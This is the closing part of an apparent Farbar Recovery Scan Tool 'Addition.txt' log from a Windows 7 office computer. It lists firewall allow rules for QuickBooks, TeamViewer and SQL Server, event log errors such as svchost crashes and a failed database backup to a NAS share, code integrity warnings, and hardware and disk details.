FirewallRules: [{1A5A32EE-BB1E-43DB-BDBF-ACDCEF29168B}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{34425FE2-CB0B-4252-9DBE-B9523DEDF206}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{83811F94-B77E-45DE-B3DF-034338130E3A}] => (Allow) C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.ECC\MSSQL\Binn\sqlservr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1020FED2-9E47-4F0A-957B-4DF0691DA6E8}] => (Allow) C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.ECC\MSSQL\Binn\sqlservr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CA90AE97-D28F-48D0-AE44-5986709F77B4}] => (Allow) LPort=50664
FirewallRules: [{A8EF2570-029B-4262-A74C-7DBD0EC9E251}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{E9EE2AFA-479B-42A2-937D-5B9015494D0C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{494F26E8-3158-4DB1-A90B-263A9930DDF2}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{0F4F3E19-E129-451D-9F0B-44E931E579FF}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{AFD8754E-EA60-4417-A914-AD63D5B50B2B}] => (Allow) C:\Program Files (x86)\UPS\WSTD\WSDB\MSSQL11.UPSWS2012SERVER\MSSQL\Binn\sqlservr.exe No File
FirewallRules: [{4D5E85E9-6060-447E-8E35-8F9AF79AFBFF}] => (Allow) C:\Program Files (x86)\UPS\WSTD\WSDB\MSSQL11.UPSWS2012SERVER\MSSQL\Binn\sqlservr.exe No File
FirewallRules: [{E3AD44B9-23F9-4016-AEC2-F9162C4454EF}] => (Allow) LPort=56728
FirewallRules: [{6AAD144B-3F9C-491E-9222-EFD55173B6B0}] => (Allow) %ProgramFiles% (x86)\Intuit\QuickBooks 2018\QBW32Pro.exe No File
FirewallRules: [{004883EA-DBE0-4503-A3AA-67E8D5CB746A}] => (Allow) %ProgramFiles% (x86)\Intuit\QuickBooks 2018\QBW32Pro.exe No File
FirewallRules: [{56B563DA-F165-4399-8D1A-8BBEE927F9D9}] => (Allow) LPort=55803
FirewallRules: [{5317B5EF-E34F-4E63-A26F-8DDC03C9ECD4}] => (Allow) C:\Program Files (x86)\UPS\WSTD\WSDB\MSSQL12.UPSWS2014SERVER\MSSQL\Binn\sqlservr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{614FFE48-AFFD-4306-9A27-55DA11DEC635}] => (Allow) C:\Program Files (x86)\UPS\WSTD\WSDB\MSSQL12.UPSWS2014SERVER\MSSQL\Binn\sqlservr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{984509F9-C87B-4CBA-8253-D65870DEB118}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{915FE254-59B7-4D02-9AB2-224C059E2143}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{B90DF48B-1ECF-4361-B26E-B87D070A4010}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{31B6C124-D5AC-4F82-B2BB-61E943554645}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{13BAEA5E-780A-4C94-ACAD-C59234132DCF}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{F024193F-48F2-40AB-A452-A9973091DADF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{654C487A-D99F-4935-87C2-E2530D544797}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{F39D952A-369F-43D5-A8A3-80DBF469BA59}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{CB1C8975-EF4F-4B6B-9793-3F66FF58A721}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{E06D214C-5F83-43BC-A2DA-4CBD982102FA}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{E102F1E4-78ED-47EE-AE00-AFACA8BF8566}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{62058CAB-EB39-4BF0-A639-B7EC22B31ACF}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{E04B1434-49C9-4BBC-8964-02828FA24781}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2015\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{47CB716E-45CE-4B7B-ACB3-9F235A75540D}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{DC2635B1-CC50-408C-8EE2-55644B423611}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbdbmgrn.exe (Intuit, Inc.) [File not signed]
FirewallRules: [{D6934097-1D06-44DE-83AE-ED3C22151B38}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{00730B18-3280-4E65-AAB4-7862A16A3DB6}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{992FBD2C-C653-4FF7-86F2-8D8DCAA93587}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{85A2E668-C055-499B-852A-21C62E58DF36}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{A6EB1A89-3651-4F96-87D8-5BF3374A8394}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{39DCBE18-94BE-4EB5-BDE5-83DB1A0F81B4}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2018\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{8AE2CA54-7919-4EB6-ACA4-E85067A69946}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{E51D1187-6AEC-4B21-AA11-1AAE453BADDB}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbdbmgrn.exe (Intuit, Inc. -> SAP SE or an SAP affiliate company)
FirewallRules: [{09ABA1FD-F804-4379-9881-D0B937FF447C}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{50983BD6-0E8A-4D19-9DA9-1D630A34ACAC}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\qbw32.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{715467A8-CD9A-430F-A6FE-4C1A1A6ABA02}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{E9DE2671-5C7A-4032-80B2-775E6EE60DE8}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\dbmanagerexe.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{BB6DA91A-73F0-4195-97B5-5D9F45730E8E}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{160E247D-DF3B-4146-B561-5D1D4FA10294}] => (Allow) C:\Program Files (x86)\Intuit\QuickBooks 2019\filemanagement.exe (Intuit, Inc. -> )
FirewallRules: [{0752E182-FF62-44C2-8DCA-28C62A4B3189}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{7353A69D-3C08-4BC5-9AD7-B916D36DAB8A}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{E4C6581D-ADBE-4C67-A555-1280C5B1C3F2}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{3EBE1BAF-F0D2-4060-9C6F-21A4A3CD4777}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\qblaunch.exe (Intuit, Inc. -> Intuit Inc.)
FirewallRules: [{945E7F61-4D7E-4DAB-A414-BFDA33A2C089}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
==================== Codecs (Whitelisted) ==================
==================== Restore Points =========================
08-10-2019 18:56:15 Windows Update
08-10-2019 19:05:13 Windows Update
==================== Faulty Device Manager Devices =============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
==================== Event log errors: =========================
Application errors:
==================
Error: (10/08/2019 07:28:23 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Desktop Pro Plus 2019":
WPR: calling ABORT_CLOSE
Error: (10/08/2019 07:10:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (10/08/2019 07:05:03 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000180013c47
Faulting process id: 0x1100
Faulting application start time: 0x01d57e35330da958
Faulting application path: C:\Windows\system32\svchost.exe
Faulting module path: unknown
Report Id: 70ceb63a-ea28-11e9-ab14-2c56dc97e7f2
Error: (10/08/2019 07:04:57 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000180013c47
Faulting process id: 0x1d10
Faulting application start time: 0x01d57e352f9bb3c7
Faulting application path: C:\Windows\system32\svchost.exe
Faulting module path: unknown
Report Id: 6d5b3a09-ea28-11e9-ab14-2c56dc97e7f2
Error: (10/08/2019 07:04:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000180013c47
Faulting process id: 0xc80
Faulting application start time: 0x01d57e352bfd7e12
Faulting application path: C:\Windows\system32\svchost.exe
Faulting module path: unknown
Report Id: 69be8af4-ea28-11e9-ab14-2c56dc97e7f2
Error: (10/08/2019 07:04:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x0000000180013c47
Faulting process id: 0x1c9c
Faulting application start time: 0x01d57e35286b7d5e
Faulting application path: C:\Windows\system32\svchost.exe
Faulting module path: unknown
Report Id: 66311e20-ea28-11e9-ab14-2c56dc97e7f2
Error: (10/08/2019 07:04:43 PM) (Source: MSSQL$ECC) (EventID: 3041) (User: OFFICE)
Description: BACKUP failed to complete the command BACKUP DATABASE UnifyDB. Check the backup application log for detailed messages.
Error: (10/08/2019 07:04:43 PM) (Source: MSSQL$ECC) (EventID: 18204) (User: OFFICE)
Description: BackupDiskFile::CreateMedia: Backup device '\\PMCSTONE_NAS\home\Backup\Webgility\UnifyDB.bak' failed to create. Operating system error 1326(Logon failure: unknown user name or bad password.).
System errors:
=============
Error: (10/08/2019 07:52:05 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
and APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
Error: (10/08/2019 07:52:05 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
and APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
Error: (10/08/2019 07:51:54 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
and APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
Error: (10/08/2019 07:51:54 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
{22279AF5-03AE-4CAF-989D-2530918B2F1C}
and APPID
{0773CCD6-59A2-4D26-B235-19247767E645}
to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC). This security permission can be modified using the Component Services administrative tool.
Error: (10/08/2019 07:44:00 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The SQL Server (ECC) service terminated unexpectedly. It has done this 1 time(s).
Error: (10/08/2019 07:44:00 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The SQL Server (UPSWS2014SERVER) service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
Error: (10/08/2019 07:44:00 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The QuickBooksDB29 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.
Error: (10/08/2019 07:44:00 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Intel® Dynamic Application Loader Host Interface Service service terminated unexpectedly. It has done this 1 time(s).
CodeIntegrity:
===================================
Date: 2019-10-08 19:37:52.381
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
Date: 2019-10-08 19:27:36.302
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
Date: 2019-10-08 19:17:11.664
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
Date: 2019-10-08 19:10:12.582
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
Date: 2019-10-08 19:05:10.612
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
Date: 2019-10-08 18:59:29.144
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
Date: 2019-10-08 18:49:11.997
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
Date: 2019-10-04 15:01:38.527
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
==================== Memory info ===========================
BIOS: American Megatrends Inc. 2801 11/11/2015
Motherboard: ASUSTeK COMPUTER INC. Z97-A-USB31
Processor: Intel® Core i7-4790K CPU @ 4.00GHz
Percentage of memory in use: 34%
Total physical RAM: 16258.05 MB
Available physical RAM: 10635.2 MB
Total Virtual: 32514.24 MB
Available Virtual: 25837.71 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:447.03 GB) (Free:214.1 GB) NTFS
Drive d: (Repair disc Windows 7 64-bit) (CDROM) (Total:0.16 GB) (Free:0 GB) UDF
Drive f: () (Removable) (Total:1.87 GB) (Free:0.12 GB) FAT
\\?\Volume{d2d6eaec-243d-11e6-b5b6-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 447.1 GB) (Disk ID: B7F6AEA4)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=447 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 1.9 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=1.9 GB) - (Type=0E)
==================== End of Addition.txt ============================